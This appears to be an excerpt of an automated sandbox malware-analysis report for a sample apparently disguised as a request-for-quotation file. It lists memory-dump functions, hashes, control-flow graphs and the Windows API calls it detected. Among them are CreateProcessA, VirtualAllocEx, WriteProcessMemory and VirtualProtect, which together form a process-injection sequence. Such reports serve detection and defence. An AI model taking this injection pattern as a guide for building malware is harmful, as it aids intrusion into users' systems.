                                                          • Instruction Fuzzy Hash: FFD11775E15218CFEB98CFA5D994BADBBF6FB89300F1080A9D509AB290CB745D85CF40
                                                          Function 065F9C4A Relevance: .3, Instructions: 286COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1480326951.00000000065F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065F0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_65f0000_RFQ-12202430_ACD_Group.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 2039c05473a65f2a658a8fb56a816ec36fe4efdc0f4b31f2f63af25808f5a80e
                                                          • Instruction ID: 27d822e8473386702dc26adc15d60646349da1499be237e8b8be51bd5de5c7a1
                                                          • Opcode Fuzzy Hash: 2039c05473a65f2a658a8fb56a816ec36fe4efdc0f4b31f2f63af25808f5a80e
                                                          • Instruction Fuzzy Hash: 30D10775E11218CFDB94DFA8D994BADBBF2FB89300F5080A9D509AB294CB745E85CF40
                                                          Function 065F97EF Relevance: .3, Instructions: 257COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1480326951.00000000065F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065F0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_65f0000_RFQ-12202430_ACD_Group.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: cd66fa142bfa25b580644c0b77ba5e32d8dd411bf4569969891aa0367def0499
                                                          • Instruction ID: 4ade69b28374e8ca437f95924f0f5d7653dc035a3f2ea8193993998392715549
                                                          • Opcode Fuzzy Hash: cd66fa142bfa25b580644c0b77ba5e32d8dd411bf4569969891aa0367def0499
                                                          • Instruction Fuzzy Hash: 00B10775E15218CFDB94CFA8D994BADBBF2FB89300F5080A9D50AAB290CB745D85CF40
                                                          Function 064B77B8 Relevance: .2, Instructions: 236COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1479408560.00000000064B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064B0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_64b0000_RFQ-12202430_ACD_Group.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: d1a239f128ea04695f8ed9c1b9fea5fb35605f256ab0e5b2d37fbe96a7165677
                                                          • Instruction ID: 0522ae7fa60bbfab332f0bc62dbab5bcad4f375bc3c0c522aab894d683e4f835
                                                          • Opcode Fuzzy Hash: d1a239f128ea04695f8ed9c1b9fea5fb35605f256ab0e5b2d37fbe96a7165677
                                                          • Instruction Fuzzy Hash: 34A1B370E05208CFEB94CFA9D984BEDBBF6BB89304F20A06AD409AB251D7749945CF50
                                                          Function 064B77AA Relevance: .2, Instructions: 233COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1479408560.00000000064B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064B0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_64b0000_RFQ-12202430_ACD_Group.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 15070bb0392b05fd9a9dddf1b2699b42a30e4e865d7cdf64191ae7df7cc4761a
                                                          • Instruction ID: 8f5ab544adcbec751508c2aff87bb2de64c431ae8423a2a87aa34a4c663a1afe
                                                          • Opcode Fuzzy Hash: 15070bb0392b05fd9a9dddf1b2699b42a30e4e865d7cdf64191ae7df7cc4761a
                                                          • Instruction Fuzzy Hash: 11A1C170E05208CFEB94CFA9D984BEDBBF2BB89304F20A46AD409AB355D7349945CF50
                                                          Function 066D598B Relevance: .2, Instructions: 227COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1481046396.00000000066D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066D0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_66d0000_RFQ-12202430_ACD_Group.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 4b999fd1a68ea53f668a222562519500f44c7db22127da4416f687996e0120ba
                                                          • Instruction ID: 828e2e429c473b376d8f5f7955ad5fc762071b092aaaa713911aa38b1ed94cb6
                                                          • Opcode Fuzzy Hash: 4b999fd1a68ea53f668a222562519500f44c7db22127da4416f687996e0120ba
                                                          • Instruction Fuzzy Hash: E6914A70E152189FDB94DF68D894BAEB7F6FB89304F1090A9D40AAB394CB345D85CF90
                                                          Function 065F7B59 Relevance: .2, Instructions: 200COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1480326951.00000000065F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065F0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_65f0000_RFQ-12202430_ACD_Group.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: decba8ab0b8baebb95ebe15d0034ee14c3a27883f002d6117d057263401722e2
                                                          • Instruction ID: 01b368d0f4a5e0f8f29e47d1233d5b701b38280c0edbdf4b92f2688912a63771
                                                          • Opcode Fuzzy Hash: decba8ab0b8baebb95ebe15d0034ee14c3a27883f002d6117d057263401722e2
                                                          • Instruction Fuzzy Hash: 9F813C74D25218CFEB50DFA8E884BAEBBF2FB89304F108469D609A7250DB745D85CF40
                                                          Function 064B7A93 Relevance: .2, Instructions: 197COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1479408560.00000000064B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064B0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_64b0000_RFQ-12202430_ACD_Group.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: fd45d373accd4900daa588945d69e127e2a717caa0a2443a1f34d3982ae4553d
                                                          • Instruction ID: 908693c9d3c9463c535f9c8fd0c918f31482f5bab24193188ca18771285a4feb
                                                          • Opcode Fuzzy Hash: fd45d373accd4900daa588945d69e127e2a717caa0a2443a1f34d3982ae4553d
                                                          • Instruction Fuzzy Hash: 4C919274E05208CFEB94CFA9D984BDDBBF2BB89304F20A46AD409AB351D7349985CF50
                                                          Function 016D1BFF Relevance: .2, Instructions: 193COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1465509854.00000000016D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 016D0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_16d0000_RFQ-12202430_ACD_Group.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 39a473ae797ac25a2fd5a421e2047e66599c7dc512d73c46a318467372120714
                                                          • Instruction ID: 869798b150f23eb6b7e895f8842aa1855874a20583b8f13a529a059a71ecae6f
                                                          • Opcode Fuzzy Hash: 39a473ae797ac25a2fd5a421e2047e66599c7dc512d73c46a318467372120714
                                                          • Instruction Fuzzy Hash: AA8111B4D04208DFDB14DFA9D884BAEBBF1FB49300F10906AD415AB3A1D7789986CF85
                                                          Function 065F7B68 Relevance: .2, Instructions: 191COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1480326951.00000000065F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065F0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_65f0000_RFQ-12202430_ACD_Group.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 52f15309684cea01e8ce001acc45159d9b8bd8829d2a4ad3de35ffd6e8fe1677
                                                          • Instruction ID: 5756a838f17749330a938e9ebf89dacc3160b04603de995939342aa329611359
                                                          • Opcode Fuzzy Hash: 52f15309684cea01e8ce001acc45159d9b8bd8829d2a4ad3de35ffd6e8fe1677
                                                          • Instruction Fuzzy Hash: 9D812C74D25218CFEB90DFA8E884BAEBBF2FB49304F109469D609A7250DB785D85CF40
                                                          Function 065FC848 Relevance: .1, Instructions: 105COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1480326951.00000000065F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065F0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_65f0000_RFQ-12202430_ACD_Group.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: eae45e9130164becc8edebfe4d1bf668d48a568bcdbaf68496827931566846d3
                                                          • Instruction ID: 0e4cf7f6f6c084a3d2a0536d7ef92cdf8b9ef6fd8434242e84590db705e87d47
                                                          • Opcode Fuzzy Hash: eae45e9130164becc8edebfe4d1bf668d48a568bcdbaf68496827931566846d3
                                                          • Instruction Fuzzy Hash: 473137B1D052489FEB58CFAAD9407DEBBF6BF89300F10C4AAD919AB254DB304945CF94
                                                          Function 064B0D72 Relevance: 2.6, Strings: 2, Instructions: 55COMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 313 64b0d72-64b0dcb 317 64b14e8-64b14ef 313->317 318 64b0dd1-64b0dd9 313->318 320 64b1bb2-64b1bb9 317->320 321 64b14f5-64b14fd 317->321 319 64b011f-64b0127 318->319 324 64b0129-64b06ee 319->324 325 64b0130-64b1fae 319->325 322 64b1bbf-64b1be4 320->322 323 64b2a00-64b2a0f 320->323 321->319 322->319 334 64b1bea-64b1bf2 322->334 330 64b2a16-64b2a29 323->330 336 64b0b12-64b0b19 324->336 337 64b06f4-64b06fc 324->337 327 64b1dc3-64b1dcf 325->327 328 64b1fb4-64b1fbc 325->328 332 64b1dd1 327->332 333 64b1dd6-64b1e09 327->333 328->319 332->333 344 64b1e0f-64b1e34 333->344 345 64b0985-64b098c 333->345 334->319 339 64b0b1f-64b0b44 336->339 340 64b1ae2-64b1b31 336->340 337->319 339->319 348 64b0b4a-64b0b52 339->348 340->319 354 64b1b37-64b1b3f 340->354 344->319 353 64b1e3a-64b1e42 344->353 346 64b0992-64b099a 345->346 347 64b0701-64b070d 345->347 346->319 349 64b070f 347->349 350 64b0714-64b0757 347->350 348->319 349->350 357 64b036d-64b0379 350->357 358 64b075d-64b0782 350->358 353->319 354->319 359 64b037b 357->359 360 64b0380-64b0390 357->360 358->319 363 64b0788-64b0790 358->363 359->360 364 64b11f7-64b1203 360->364 365 64b0396-64b03bb 360->365 363->319 366 64b120a-64b121d 364->366 367 64b1205 364->367 365->319 371 64b03c1-64b03c9 365->371 369 64b121f 366->369 370 64b1224-64b1242 366->370 367->366 369->370 373 64b1249-64b1293 370->373 374 64b1244 370->374 371->319 373->319 374->373
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1479408560.00000000064B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064B0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_64b0000_RFQ-12202430_ACD_Group.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: .$q
                                                          • API String ID: 0-460854004
                                                          • Opcode ID: f41d502fb1c79e3c042616fb3e902cbd60b6bd02766433114750c375d255e856
                                                          • Instruction ID: e10f0fc6915befc6cf020a3e542ba0e320e8fa48e55aef738d5bcff117ae54e4
                                                          • Opcode Fuzzy Hash: f41d502fb1c79e3c042616fb3e902cbd60b6bd02766433114750c375d255e856
                                                          • Instruction Fuzzy Hash: 81210570805268CFEBAA8F64DC48BDEBBB1BB05309F4421EAD10967291C7750AC5CF51
                                                          Function 068A2C78 Relevance: 2.5, Strings: 2, Instructions: 46COMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 379 68a2c78-68a2d0c call 68ba710 385 68a2d12-68a2d4c 379->385 387 68a010d-68a0118 385->387 388 68a2d52-68a2d5d 385->388 389 68a011a-68a4708 387->389 390 68a0121-68ac99c 387->390 388->387 389->387 404 68a470e-68a4719 389->404 390->387 404->387
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1481376957.00000000068A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068A0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_68a0000_RFQ-12202430_ACD_Group.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: A$]
                                                          • API String ID: 0-1781264906
                                                          • Opcode ID: edfdfb9eca8c8a3c9107e64f3164804a55fa468a74122ffe2d7df232534dec39
                                                          • Instruction ID: 519e5d598dc3dc5c37d2648840641ef16cdc17ca96e3df41a2ad863feca2d362
                                                          • Opcode Fuzzy Hash: edfdfb9eca8c8a3c9107e64f3164804a55fa468a74122ffe2d7df232534dec39
                                                          • Instruction Fuzzy Hash: 1F21B4749502298FDBA0DF18D888B9DB7B5FB48304F1045E5990DA7394DB389EC5CF51
                                                          Function 066D3543 Relevance: 1.8, APIs: 1, Instructions: 264processCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 815 66d3543-66d35da 818 66d35dc-66d35f3 815->818 819 66d3623-66d364b 815->819 818->819 824 66d35f5-66d35fa 818->824 822 66d364d-66d3661 819->822 823 66d3691-66d36e7 819->823 822->823 831 66d3663-66d3668 822->831 833 66d372d-66d37c2 CreateProcessA 823->833 834 66d36e9-66d36fd 823->834 825 66d361d-66d3620 824->825 826 66d35fc-66d3606 824->826 825->819 828 66d3608 826->828 829 66d360a-66d3619 826->829 828->829 829->829 832 66d361b 829->832 835 66d368b-66d368e 831->835 836 66d366a-66d3674 831->836 832->825 848 66d37cb-66d3841 833->848 849 66d37c4-66d37ca 833->849 834->833 842 66d36ff-66d3704 834->842 835->823 837 66d3678-66d3687 836->837 838 66d3676 836->838 837->837 841 66d3689 837->841 838->837 841->835 843 66d3727-66d372a 842->843 844 66d3706-66d3710 842->844 843->833 846 66d3714-66d3723 844->846 847 66d3712 844->847 846->846 850 66d3725 846->850 847->846 855 66d3851-66d3855 848->855 856 66d3843-66d3847 848->856 849->848 850->843 858 66d3865-66d3869 855->858 859 66d3857-66d385b 855->859 856->855 857 66d3849 856->857 857->855 861 66d3879 858->861 862 66d386b-66d386f 858->862 859->858 860 66d385d 859->860 860->858 864 66d387a 861->864 862->861 863 66d3871 862->863 863->861 864->864
                                                          APIs
                                                          • CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 066D37AF
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1481046396.00000000066D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066D0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_66d0000_RFQ-12202430_ACD_Group.jbxd
                                                          Similarity
                                                          • API ID: CreateProcess
                                                          • String ID:
                                                          • API String ID: 963392458-0
                                                          • Opcode ID: 7caff32be9cb958ef9dd1c91a596bf2e61273c300a0c65e6492e048fd4c0f9f9
                                                          • Instruction ID: 880d024dcb8403c9e3ddceefa77b2b8793a4914defa51e52d98c2ac523222a17
                                                          • Opcode Fuzzy Hash: 7caff32be9cb958ef9dd1c91a596bf2e61273c300a0c65e6492e048fd4c0f9f9
                                                          • Instruction Fuzzy Hash: 03A112B4D00258DFDB60CFA9C8857EEBBB1BB0A300F109569E858B7340DB749985CF96
                                                          Function 066D3548 Relevance: 1.8, APIs: 1, Instructions: 261processCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 865 66d3548-66d35da 867 66d35dc-66d35f3 865->867 868 66d3623-66d364b 865->868 867->868 873 66d35f5-66d35fa 867->873 871 66d364d-66d3661 868->871 872 66d3691-66d36e7 868->872 871->872 880 66d3663-66d3668 871->880 882 66d372d-66d37c2 CreateProcessA 872->882 883 66d36e9-66d36fd 872->883 874 66d361d-66d3620 873->874 875 66d35fc-66d3606 873->875 874->868 877 66d3608 875->877 878 66d360a-66d3619 875->878 877->878 878->878 881 66d361b 878->881 884 66d368b-66d368e 880->884 885 66d366a-66d3674 880->885 881->874 897 66d37cb-66d3841 882->897 898 66d37c4-66d37ca 882->898 883->882 891 66d36ff-66d3704 883->891 884->872 886 66d3678-66d3687 885->886 887 66d3676 885->887 886->886 890 66d3689 886->890 887->886 890->884 892 66d3727-66d372a 891->892 893 66d3706-66d3710 891->893 892->882 895 66d3714-66d3723 893->895 896 66d3712 893->896 895->895 899 66d3725 895->899 896->895 904 66d3851-66d3855 897->904 905 66d3843-66d3847 897->905 898->897 899->892 907 66d3865-66d3869 904->907 908 66d3857-66d385b 904->908 905->904 906 66d3849 905->906 906->904 910 66d3879 907->910 911 66d386b-66d386f 907->911 908->907 909 66d385d 908->909 909->907 913 66d387a 910->913 911->910 912 66d3871 911->912 912->910 913->913
                                                          APIs
                                                          • CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 066D37AF
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1481046396.00000000066D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066D0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_66d0000_RFQ-12202430_ACD_Group.jbxd
                                                          Similarity
                                                          • API ID: CreateProcess
                                                          • String ID:
                                                          • API String ID: 963392458-0
                                                          • Opcode ID: a43a566ec20f8cff1ccf532db01bdfc97161498f0d930dc8793743634466d9d5
                                                          • Instruction ID: d5e7a0fad7f5218aca41552a2940f36b6fff613e3966dcf56282bc218234cb99
                                                          • Opcode Fuzzy Hash: a43a566ec20f8cff1ccf532db01bdfc97161498f0d930dc8793743634466d9d5
                                                          • Instruction Fuzzy Hash: 84A101B4D00258DFDB60CFA9C8857EEBBB1BB0A300F149569E858B7340DB749985CF86
                                                          Function 065D78C4 Relevance: 1.7, APIs: 1, Instructions: 182fileCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 1427 65d78c4-65d793b 1431 65d793d-65d7951 1427->1431 1432 65d7981-65d79a6 1427->1432 1431->1432 1437 65d7953-65d7958 1431->1437 1435 65d79ec-65d7a5b CopyFileA 1432->1435 1436 65d79a8-65d79bc 1432->1436 1449 65d7a5d-65d7a63 1435->1449 1450 65d7a64-65d7ac6 1435->1450 1436->1435 1444 65d79be-65d79c3 1436->1444 1438 65d797b-65d797e 1437->1438 1439 65d795a-65d7964 1437->1439 1438->1432 1441 65d7968-65d7977 1439->1441 1442 65d7966 1439->1442 1441->1441 1445 65d7979 1441->1445 1442->1441 1446 65d79c5-65d79cf 1444->1446 1447 65d79e6-65d79e9 1444->1447 1445->1438 1451 65d79d1 1446->1451 1452 65d79d3-65d79e2 1446->1452 1447->1435 1449->1450 1458 65d7ac8-65d7acc 1450->1458 1459 65d7ad6-65d7ada 1450->1459 1451->1452 1452->1452 1453 65d79e4 1452->1453 1453->1447 1458->1459 1462 65d7ace 1458->1462 1460 65d7adc-65d7ae0 1459->1460 1461 65d7aea 1459->1461 1460->1461 1463 65d7ae2 1460->1463 1464 65d7aeb 1461->1464 1462->1459 1463->1461 1464->1464
                                                          APIs
                                                          • CopyFileA.KERNEL32(?,?,?), ref: 065D7A4B
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1480079740.00000000065D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065D0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_65d0000_RFQ-12202430_ACD_Group.jbxd
                                                          Similarity
                                                          • API ID: CopyFile
                                                          • String ID:
                                                          • API String ID: 1304948518-0
                                                          • Opcode ID: 7cdda01cd76a191c860bf6503ba4723446a5456b4279c76cb48dbf4b29756f4e
                                                          • Instruction ID: 7ea05b63484d90a2ea1ed0a1b1b019b5d15ee3eaba52cc516d91eed4f413b576
                                                          • Opcode Fuzzy Hash: 7cdda01cd76a191c860bf6503ba4723446a5456b4279c76cb48dbf4b29756f4e
                                                          • Instruction Fuzzy Hash: CC611571D00358DFDB64CFA9C8457EEBBB1BF09314F24812AE854AB281DB748985CF85
                                                          Function 065D78D0 Relevance: 1.7, APIs: 1, Instructions: 169fileCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 1465 65d78d0-65d793b 1467 65d793d-65d7951 1465->1467 1468 65d7981-65d79a6 1465->1468 1467->1468 1473 65d7953-65d7958 1467->1473 1471 65d79ec-65d7a5b CopyFileA 1468->1471 1472 65d79a8-65d79bc 1468->1472 1485 65d7a5d-65d7a63 1471->1485 1486 65d7a64-65d7ac6 1471->1486 1472->1471 1480 65d79be-65d79c3 1472->1480 1474 65d797b-65d797e 1473->1474 1475 65d795a-65d7964 1473->1475 1474->1468 1477 65d7968-65d7977 1475->1477 1478 65d7966 1475->1478 1477->1477 1481 65d7979 1477->1481 1478->1477 1482 65d79c5-65d79cf 1480->1482 1483 65d79e6-65d79e9 1480->1483 1481->1474 1487 65d79d1 1482->1487 1488 65d79d3-65d79e2 1482->1488 1483->1471 1485->1486 1494 65d7ac8-65d7acc 1486->1494 1495 65d7ad6-65d7ada 1486->1495 1487->1488 1488->1488 1489 65d79e4 1488->1489 1489->1483 1494->1495 1498 65d7ace 1494->1498 1496 65d7adc-65d7ae0 1495->1496 1497 65d7aea 1495->1497 1496->1497 1499 65d7ae2 1496->1499 1500 65d7aeb 1497->1500 1498->1495 1499->1497 1500->1500
                                                          APIs
                                                          • CopyFileA.KERNEL32(?,?,?), ref: 065D7A4B
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1480079740.00000000065D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065D0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_65d0000_RFQ-12202430_ACD_Group.jbxd
                                                          Similarity
                                                          • API ID: CopyFile
                                                          • String ID:
                                                          • API String ID: 1304948518-0
                                                          • Opcode ID: a68d19a7fdcf61f8091057292b273d721e303a19a354123d7d60d3e85d6344ae
                                                          • Instruction ID: ea3ce2d2cbea922742658b7c0fc15a2c6e7cf96e95cf6b5acab3eafea39acd88
                                                          • Opcode Fuzzy Hash: a68d19a7fdcf61f8091057292b273d721e303a19a354123d7d60d3e85d6344ae
                                                          • Instruction Fuzzy Hash: 2C611371D00318DFDB64CFA9C9857EDBBF1BB09310F24852AE854A7280DB749A85CF85
                                                          Function 065FDAD1 Relevance: 1.6, APIs: 1, Instructions: 136memoryCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 1501 65fdad1-65fdadd 1502 65fdadf-65fdaf8 1501->1502 1503 65fdb20-65fdbe4 VirtualProtect 1501->1503 1506 65fdaff-65fdb1c 1502->1506 1507 65fdafa 1502->1507 1512 65fdbed-65fdc3d 1503->1512 1513 65fdbe6-65fdbec 1503->1513 1507->1506 1513->1512
                                                          APIs
                                                          • VirtualProtect.KERNELBASE(?,?,?,?), ref: 065FDBD4
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1480326951.00000000065F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065F0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_65f0000_RFQ-12202430_ACD_Group.jbxd
                                                          Similarity
                                                          • API ID: ProtectVirtual
                                                          • String ID:
                                                          • API String ID: 544645111-0
                                                          • Opcode ID: 3cefdf584528aa7162d6857bbf19942ab3d99e6777d07bc3bf8e2eb02242b8ed
                                                          • Instruction ID: e59cc936ad6a9276bcf5565150a833eba4d79e8b747efcd258d84b92004f10df
                                                          • Opcode Fuzzy Hash: 3cefdf584528aa7162d6857bbf19942ab3d99e6777d07bc3bf8e2eb02242b8ed
                                                          • Instruction Fuzzy Hash: A5511174D05248AFCB11CFA9D840AAEFFF0BF49310F1484AAE814B7251D735A945CF94
                                                          Function 066D47B8 Relevance: 1.6, APIs: 1, Instructions: 119injectionCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 1518 66d47b8-66d482b 1521 66d482d-66d483f 1518->1521 1522 66d4842-66d48a3 WriteProcessMemory 1518->1522 1521->1522 1524 66d48ac-66d48fe 1522->1524 1525 66d48a5-66d48ab 1522->1525 1525->1524
                                                          APIs
                                                          • WriteProcessMemory.KERNEL32(?,?,?,?,?), ref: 066D4893
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1481046396.00000000066D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066D0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_66d0000_RFQ-12202430_ACD_Group.jbxd
                                                          Similarity
                                                          • API ID: MemoryProcessWrite
                                                          • String ID:
                                                          • API String ID: 3559483778-0
                                                          • Opcode ID: b19355499adfdf56d61c92ef322edc442e44d25beedaaa856f575ef5127dab82
                                                          • Instruction ID: 158a2b5348bf78e91296a462c695d6ecdd6529f255181558b1b320c0071d291d
                                                          • Opcode Fuzzy Hash: b19355499adfdf56d61c92ef322edc442e44d25beedaaa856f575ef5127dab82
                                                          • Instruction Fuzzy Hash: D441CAB4D012589FCB10CFA9D980ADEFBF1BB49310F24942AE818B7240D735AA41CFA4
                                                          Function 066D47C0 Relevance: 1.6, APIs: 1, Instructions: 116injectionCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 1530 66d47c0-66d482b 1532 66d482d-66d483f 1530->1532 1533 66d4842-66d48a3 WriteProcessMemory 1530->1533 1532->1533 1535 66d48ac-66d48fe 1533->1535 1536 66d48a5-66d48ab 1533->1536 1536->1535
                                                          APIs
                                                          • WriteProcessMemory.KERNEL32(?,?,?,?,?), ref: 066D4893
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1481046396.00000000066D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066D0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_66d0000_RFQ-12202430_ACD_Group.jbxd
                                                          Similarity
                                                          • API ID: MemoryProcessWrite
                                                          • String ID:
                                                          • API String ID: 3559483778-0
                                                          • Opcode ID: e83b4eea783bd7bc0b19592555236124863b4ecccef23a3b7ee3f5fc4a67b085
                                                          • Instruction ID: 875a353e5503ed677ce5f29ca11ab96aff13a5ba0e8fc63a97a015b2a04b3625
                                                          • Opcode Fuzzy Hash: e83b4eea783bd7bc0b19592555236124863b4ecccef23a3b7ee3f5fc4a67b085
                                                          • Instruction Fuzzy Hash: 1C41B9B5D012589FCF00CFA9D980ADEFBF1BB49310F24902AE818B7200D735AA41CFA4
                                                          Function 066D44BB Relevance: 1.6, APIs: 1, Instructions: 104memoryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 066D456A
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1481046396.00000000066D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066D0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_66d0000_RFQ-12202430_ACD_Group.jbxd
                                                          Similarity
                                                          • API ID: AllocVirtual
                                                          • String ID:
                                                          • API String ID: 4275171209-0
                                                          • Opcode ID: 889933760f80afebd9f088cce6abccdea9e1fd7071bd6722dadc19760282c9dd
                                                          • Instruction ID: 14b1161d06f3942174d95fa6bf01c334a334b421befb57fa916e914edbccc21b
                                                          • Opcode Fuzzy Hash: 889933760f80afebd9f088cce6abccdea9e1fd7071bd6722dadc19760282c9dd
                                                          • Instruction Fuzzy Hash: 683176B9D012589FCF10CFA9D980ADEFBB5BB49310F14942AE815B7310D735A942CFA5
                                                          Function 066D44C0 Relevance: 1.6, APIs: 1, Instructions: 101memoryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 066D456A
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1481046396.00000000066D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066D0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_66d0000_RFQ-12202430_ACD_Group.jbxd
                                                          Similarity
                                                          • API ID: AllocVirtual
                                                          • String ID:
                                                          • API String ID: 4275171209-0
                                                          • Opcode ID: 288dbc646711d07d5ca4c86d7855ee620b0757aeb58654abc73ccae281e702b4
                                                          • Instruction ID: dc2cc172ee30940bb6351a661341968b284a18784dacceb1ebbde9e0de231636
                                                          • Opcode Fuzzy Hash: 288dbc646711d07d5ca4c86d7855ee620b0757aeb58654abc73ccae281e702b4
                                                          • Instruction Fuzzy Hash: E83188B9D00258DFCF10CFA9D980A9EFBB5BB49310F14942AE815B7310D735A902CF94
